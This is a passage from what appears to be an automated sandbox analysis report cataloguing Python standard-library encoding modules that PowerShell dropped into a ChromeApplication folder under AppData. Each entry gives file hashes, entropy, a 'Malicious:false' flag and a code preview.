                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\mac_turkish.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13820
                                                                                                                                                                                                  Entropy (8bit):4.579994522132136
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:yHhsuOTDvRT7ZpouhIAs2+iy2w4KY2gKPeqB9NGc:/TquhIAl+43LFal
                                                                                                                                                                                                  MD5:1C214A3F28D2D23CC7FDED7A387585A0
                                                                                                                                                                                                  SHA1:B40E5DA5FD44499B161BD2649A6258C9A968D5D5
                                                                                                                                                                                                  SHA-256:E7F9E6C9F92513C69754AEF1D7AB235B09E9EEADBBCED4C86DF6E2AA2D06A1EF
                                                                                                                                                                                                  SHA-512:58C6B56938D709AFC4E756C2F0CC40812724B963B118CE5E1CA84798DFD17F9E324AC8F5B68FA84FE883E91CBEA8E7FC4BBE32EAE175F1B55072FAAFA7F7397A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec mac_turkish generated from 'MAPPINGS/VENDORS/APPLE/TURKISH.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-turkish',..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\mbcs.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1258
                                                                                                                                                                                                  Entropy (8bit):4.753222127608113
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:JwEFOXxVaniSdZSHvcGWQvnNq1I5atMufnb+s0ktzE9ZKj94JxFplR:JwEWxVaniSvIvdvNq1I5aCuzbztzETK2
                                                                                                                                                                                                  MD5:0D4DEB48618561417DDE714ACF399AA3
                                                                                                                                                                                                  SHA1:F617D8FC1B17AEC713947CDEE9BA302B4B2E71B1
                                                                                                                                                                                                  SHA-256:B00887A6D93C97D320CBB1C3379BD7C6DE767CCFC34ED13442891E06CC62F148
                                                                                                                                                                                                  SHA-512:722C9182DEAF8A8A65550EF86F967A559105BE6EB61C9FB3244521D51649B8A2B901E911A28FBB0CC42F1E680ACD0FC64B475E53DEE921287010EE112D982630
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python 'mbcs' Codec for Windows......Cloned by Mark Hammond (mhammond@skippinet.com.au) from ascii.py,..which was written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..# Import them explicitly to cause an ImportError..# on non-Windows systems..from codecs import mbcs_encode, mbcs_decode..# for IncrementalDecoder, IncrementalEncoder, .....import codecs....### Codec APIs....encode = mbcs_encode....def decode(input, errors='strict'):.. return mbcs_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return mbcs_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = mbcs_decode....class StreamWriter(codecs.StreamWriter):.. encode = mbcs_encode....class StreamReader(codecs.StreamReader):.. decode = mbcs_decode....### encodings module API....def getregentry():.. return codecs

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\oem.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1060
                                                                                                                                                                                                  Entropy (8bit):4.538507695911449
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:JkZSHvcGW6pjvneEq1IhhatMufko3b+00kwWzu9ZKj9wJxFplR:JSIvvBvPq1IhhaCu8M1zPzuTKiJxTz
                                                                                                                                                                                                  MD5:5163EF7B87B6DEE11BC7914E2AB1FF8E
                                                                                                                                                                                                  SHA1:92EB877FD4F77A40FC6745717139D4E335670613
                                                                                                                                                                                                  SHA-256:991D1FD2F4B815943EAE7F7BFA9F87E2DE980ACB08932BEA3258FB034902A15F
                                                                                                                                                                                                  SHA-512:99458C11DB86287A818176588DEBD76AD18401557B7D49F01FCFA85C917947CDADC310DEF539434824997922CB24005853751920EAE103B0DB04A83AB3A49E46
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python 'oem' Codec for Windows...."""..# Import them explicitly to cause an ImportError..# on non-Windows systems..from codecs import oem_encode, oem_decode..# for IncrementalDecoder, IncrementalEncoder, .....import codecs....### Codec APIs....encode = oem_encode....def decode(input, errors='strict'):.. return oem_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return oem_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = oem_decode....class StreamWriter(codecs.StreamWriter):.. encode = oem_encode....class StreamReader(codecs.StreamReader):.. decode = oem_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='oem',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreade

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\palmos.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13827
                                                                                                                                                                                                  Entropy (8bit):4.583791210166393
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:7hsuOTDvR1UrXPLouhIAs2+iXIcDCYBZt6CJTd12:mTDuhIAlX9Zt680
                                                                                                                                                                                                  MD5:3D512E1AB4D97E95DCEE526F991E685F
                                                                                                                                                                                                  SHA1:0349C9649CC54002699DD48E80DA09DDC21F9432
                                                                                                                                                                                                  SHA-256:C9E5D71C1FA128602E2D10E9BED0B271132DF349290F4465CFCA9D5DAA5BA86C
                                                                                                                                                                                                  SHA-512:DB6CE7BF928D829175D54328A6A37F1A8B691B04CEF1C76CE0C98B6B2C21959DF7BCA822416BFF39C2530E93F8B15CCB55E480FD1187C6258734923A10CF9878
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec for PalmOS 3.5.....Written by Sjoerd Mullender (sjoerd@acm.org); based on iso8859_15.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.. def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='palmos',..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\ptcp154.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):14327
                                                                                                                                                                                                  Entropy (8bit):4.653952382312946
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:63hsuOTDvRmUrXPLouhIAs2+iRQCzJHDCYbtlqtEDp+/:ZTsuhIAlXzJHftlqtEo/
                                                                                                                                                                                                  MD5:6EE7970BA64A9E17B3246A28C7CECD28
                                                                                                                                                                                                  SHA1:6B56118465C3E53A7E6C0BECE694E3643B485FC0
                                                                                                                                                                                                  SHA-256:F3BDA3C1415D37DD1C314E3F474529913F36F7021279D82DED0D11154EED55F2
                                                                                                                                                                                                  SHA-512:FAA196E1B4CCEEB771F9EC19E528696B35EAD5AC6CF1EF53DA092F75DB701FB59DBBA7FACEF3F169BC4D6DBF9336D250E0F4B9DFEE9EF2DCAD32C0FAD31C8A93
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec generated from 'PTCP154.txt' with gencodec.py.....Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY...(c) Copyright 2000 Guido van Rossum....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\punycode.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7120
                                                                                                                                                                                                  Entropy (8bit):4.519199483696464
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:l3Dt9EqNFDPf3rBEX2M+4lCQ57+K6AWujvRI3:lRSO/SLV5SZ
                                                                                                                                                                                                  MD5:DB14BE3F7A2ADCBCC07E2A32AD0A7198
                                                                                                                                                                                                  SHA1:A4F5C43558E47C3F89EB807FEFB2F49119D51B75
                                                                                                                                                                                                  SHA-256:823D1424AFA9508EA425F667F787567C80A6A28AE9742C66AA90A829ACC19748
                                                                                                                                                                                                  SHA-512:5D572DF2302FF9F74BB4E5F884F8057CDEDFB7BC6C53E82809627BD982104CB42A595B3001C8B65E5C087E94CBEDBC088951ED0EBF0D3AE3C4D88823F3C89BA6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Codec for the Punicode encoding, as specified in RFC 3492....Written by Martin v. L.wis..."""....import codecs....##################### Encoding #####################################....def segregate(str):.. """3.1 Basic code point segregation""".. base = bytearray().. extended = set().. for c in str:.. if ord(c) < 128:.. base.append(ord(c)).. else:.. extended.add(c).. extended = sorted(extended).. return bytes(base), extended....def selective_len(str, max):.. """Return the length of str, considering only characters below max.""".. res = 0.. for c in str:.. if ord(c) < max:.. res += 1.. return res....def selective_find(str, char, index, pos):.. """Return a pair (index, pos), indicating the next occurrence of.. char in str. index is the position of the character considering.. only ordinals up to and including char, and pos is the position in.. the full string. index/pos is the starting p

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\quopri_codec.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1581
                                                                                                                                                                                                  Entropy (8bit):4.656023184812778
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:5UeC1AIc1eq1AIrZ1+A1+0uwY+vIvBTKXgCJxHjH:5Uj7c1P7rZdBu6AJTKVrH
                                                                                                                                                                                                  MD5:096A80038FB883522A68E9E6C434C6A6
                                                                                                                                                                                                  SHA1:3FAFAD17359B000B8A417446E15D69EEE44A10B2
                                                                                                                                                                                                  SHA-256:4BF9A405B6F2359E5B931E0D9FB9BD9609B013688CE2E58AEBBD9BFCB119A356
                                                                                                                                                                                                  SHA-512:8088AE700A1C85C55BA10FE47EEC68193497DDC5145069C48D258604273F284F46A42D5F83D43D826A2C11CB1E71692A0D4D15005D63800F072DD883BA7890BB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Codec for quoted-printable encoding.....This codec de/encodes from bytes to bytes..."""....import codecs..import quopri..from io import BytesIO....def quopri_encode(input, errors='strict'):.. assert errors == 'strict'.. f = BytesIO(input).. g = BytesIO().. quopri.encode(f, g, quotetabs=True).. return (g.getvalue(), len(input))....def quopri_decode(input, errors='strict'):.. assert errors == 'strict'.. f = BytesIO(input).. g = BytesIO().. quopri.decode(f, g).. return (g.getvalue(), len(input))....class Codec(codecs.Codec):.. def encode(self, input, errors='strict'):.. return quopri_encode(input, errors).. def decode(self, input, errors='strict'):.. return quopri_decode(input, errors)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return quopri_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\raw_unicode_escape.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1378
                                                                                                                                                                                                  Entropy (8bit):4.688171660474759
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:JKmSEHV0yWfBx1yWfB8MufQfBxCb+nh5fBiiUQWSJzWSmi1GfBX9ZKj9UnQJxlTt:JVST31u0WMp6SJ6SL1CBTKanQJxHf
                                                                                                                                                                                                  MD5:7B4C09E92D59EF6722DFCB9C79B792A7
                                                                                                                                                                                                  SHA1:F413714763D5BC134CE873FEB69A4D79735C381B
                                                                                                                                                                                                  SHA-256:2CC24FFC2D06CAB80423ADA94E3DFFC02C010346E17EFC2FFFE86825A6E07808
                                                                                                                                                                                                  SHA-512:9584CF7FDC438C9E1D00CA3387A3F8AF103B3DDB41A65768131ACC5F3E7D40AF180D1991EF613451B2736E20D963BD2EC08F48106C15146134C8A42BB6A64D3A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python 'raw-unicode-escape' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....class Codec(codecs.Codec):.... # Note: Binding these as C functions will result in the class not.. # converting them to methods. This is intended... encode = codecs.raw_unicode_escape_encode.. decode = codecs.raw_unicode_escape_decode....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.raw_unicode_escape_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. def _buffer_decode(self, input, errors, final):.. return codecs.raw_unicode_escape_decode(input, errors, final)....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. def decode(self, input, errors='strict'):.. return codecs.raw_unicode_escape_dec

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\rot_13.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2561
                                                                                                                                                                                                  Entropy (8bit):4.800734764439435
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:7Hk1rNJm1rNJbuvNJTNJi6SJ6S0TK/JxHjRohn3xrUAosYDYKQyaDl:7EvJmvJbu1JRJivCTK/rSh1U8eSyol
                                                                                                                                                                                                  MD5:15F4EDEE2C94C2FB2F07435332C7A25A
                                                                                                                                                                                                  SHA1:D110DE2410DE8170389F26082E79C33EA643C991
                                                                                                                                                                                                  SHA-256:DC6052650356095A92A8CB3A6C63300B7F51A63B6CD3B6F636350B5F22CDA32A
                                                                                                                                                                                                  SHA-512:B9A21BB0C6AF53193088CAAF45FD94AAC472FD87927281198D88E70DE07F5D938CCAE2D081D737DEA9C6D11ACB53DCF1E2E855B464DA9871B99D522692492EBD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#!/usr/bin/env python..""" Python Character Mapping Codec for ROT13.....This codec de/encodes from str to str.....Written by Marc-Andre Lemburg (mal@lemburg.com)..."""....import codecs....### Codec APIs....class Codec(codecs.Codec):.. def encode(self, input, errors='strict'):.. return (str.translate(input, rot13_map), len(input)).... def decode(self, input, errors='strict'):.. return (str.translate(input, rot13_map), len(input))....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return str.translate(input, rot13_map)....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return str.translate(input, rot13_map)....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='rot-13',.. encode=Codec().encod

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\shift_jis.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1078
                                                                                                                                                                                                  Entropy (8bit):4.563549974626686
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:n5SqSOzff/XokKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9RcJxFplR:5Sqfwm62VJjRU8njOxLnrxLbrLKUJxTz
                                                                                                                                                                                                  MD5:9C02A2E9711192F5738426F6E7285B5C
                                                                                                                                                                                                  SHA1:6AF9532F9C07B806DBA9D248A17E14B3EE637B1C
                                                                                                                                                                                                  SHA-256:195C87BF032904002D5ADB51C256AE14D99F4A69FFC15C989CA34DD51FC203D7
                                                                                                                                                                                                  SHA-512:3607DA04E5A83C27B8F6F3223872BF7957B58EA8326E19ECEB6A5836DD4E35B1A27CF43BBB4250E0CF0B931BB4BBEF6290FB6D30BEF407CC8C137277DBEB85D2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# shift_jis.py: Python Unicode Codec for SHIFT_JIS..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_jp, codecs..import _multibytecodec as mbc....codec = _codecs_jp.getcodec('shift_jis')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='shift_jis',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\shift_jis_2004.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1098
                                                                                                                                                                                                  Entropy (8bit):4.636186915032078
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:njqMsOzff/XoRKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9ocJxFplR:jqkwF62VJjRU8njOxLnrxLbrLKHJxTz
                                                                                                                                                                                                  MD5:0440951B33F486E65DB5176D5CF99851
                                                                                                                                                                                                  SHA1:D6269777856EC9BB88F7A0413A55EBCCE3BFBE17
                                                                                                                                                                                                  SHA-256:B806ADF317A9920E69A1DEB14C7F078F0D5A9BD26BD370C89492F4DD296AA52A
                                                                                                                                                                                                  SHA-512:A92FF2A9EB64C6E42E4CB808823E1B88CD760EC83EAB27BDAAB974152FB2B8DDC2288F800BE85A622F79304DADFD7E96DDEF86FED3434B73CC53967F873BBCEA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# shift_jis_2004.py: Python Unicode Codec for SHIFT_JIS_2004..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_jp, codecs..import _multibytecodec as mbc....codec = _codecs_jp.getcodec('shift_jis_2004')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='shift_jis_2004',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=In

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\shift_jisx0213.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1098
                                                                                                                                                                                                  Entropy (8bit):4.656971526890629
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:nAqqOzff/Xo2KyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9PcJxFplR:AqHw462VJjRU8njOxLnrxLbrLKCJxTz
                                                                                                                                                                                                  MD5:CBAB0DA456CE49672F8A5CDB79018312
                                                                                                                                                                                                  SHA1:A682827169185DA5BBA2B498BF0302B2EAE087A7
                                                                                                                                                                                                  SHA-256:16BE3CDC9EFA7C3A6EC5A683BC03BCAA9DBB41FCC70C92900130175A761A9D62
                                                                                                                                                                                                  SHA-512:EFE6CF1021E7FEEF474A3C0E0B346515410716DA6536488765803F2DBD1DA2A217F23F64484634C8EDDC149086F1AD82D563EB9A7C6319976FB852747CCCCF9D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# shift_jisx0213.py: Python Unicode Codec for SHIFT_JISX0213..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_jp, codecs..import _multibytecodec as mbc....codec = _codecs_jp.getcodec('shift_jisx0213')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='shift_jisx0213',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=In

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\tis_620.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12607
                                                                                                                                                                                                  Entropy (8bit):4.621772981576072
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:WHhsuOTDvR2LUrXPLouhIAs2+ijLf00pC8i5I:zTojuhIAl0H8iG
                                                                                                                                                                                                  MD5:D9690A0F4A8779777A17C8E04C5EA6FF
                                                                                                                                                                                                  SHA1:F10E74D2FDC0BE0582B97094F50BF4A38320C6FA
                                                                                                                                                                                                  SHA-256:18AFE3A0FD28797D71762EAFFADC9822E0CB8832BE696AF2298F6727AB92627F
                                                                                                                                                                                                  SHA-512:48AEBA9D13106BECC3305F42FB4C0A9B9D3A5663C807C7B42FAC579229D9FD43E2F15BBE3AA9DB6C19216334F296D584308BB12D93C4D998D0AF607ABB621BAA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec tis_620 generated from 'python-mappings/TIS-620.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='tis-620',.. encode=Cod

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\undefined.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1348
                                                                                                                                                                                                  Entropy (8bit):4.667992147176458
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:JldJcg5qSEH6e1cUe2e1cUeFMufKUeFhKUemUQWSJzWS09ZKj9EmIcJxlTpf:JldJ9ISo1ner1neKuhe5em6SJ6S0TK2M
                                                                                                                                                                                                  MD5:7C6EF4AB65DA0214127F4E70CB74D180
                                                                                                                                                                                                  SHA1:01D2D4FAE5C7C55DDD33CE3D5DB95BC56EA68E03
                                                                                                                                                                                                  SHA-256:E882AD26197F05AFB20980407787F77D18E234F562E6EC396B7D9DF3C7EEF5FC
                                                                                                                                                                                                  SHA-512:2DEC757B249BEC760DA00B5269D51C2F7ADEF574FD68A188B64304EB1B7974C84E0B4AB89A138764203D89231DFE76AA4784C466B384655B26D510FA58522E7E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python 'undefined' Codec.... This codec will always raise a ValueError exception when being.. used. It is intended for use by the site.py file to switch off.. automatic string to Unicode coercion.....Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. raise UnicodeError("undefined encoding").... def decode(self,input,errors='strict'):.. raise UnicodeError("undefined encoding")....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. raise UnicodeError("undefined encoding")....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. raise UnicodeError("undefined encoding")....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\unicode_escape.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1350
                                                                                                                                                                                                  Entropy (8bit):4.660145850496412
                                                                                                                                                                                                  Encrypted:false
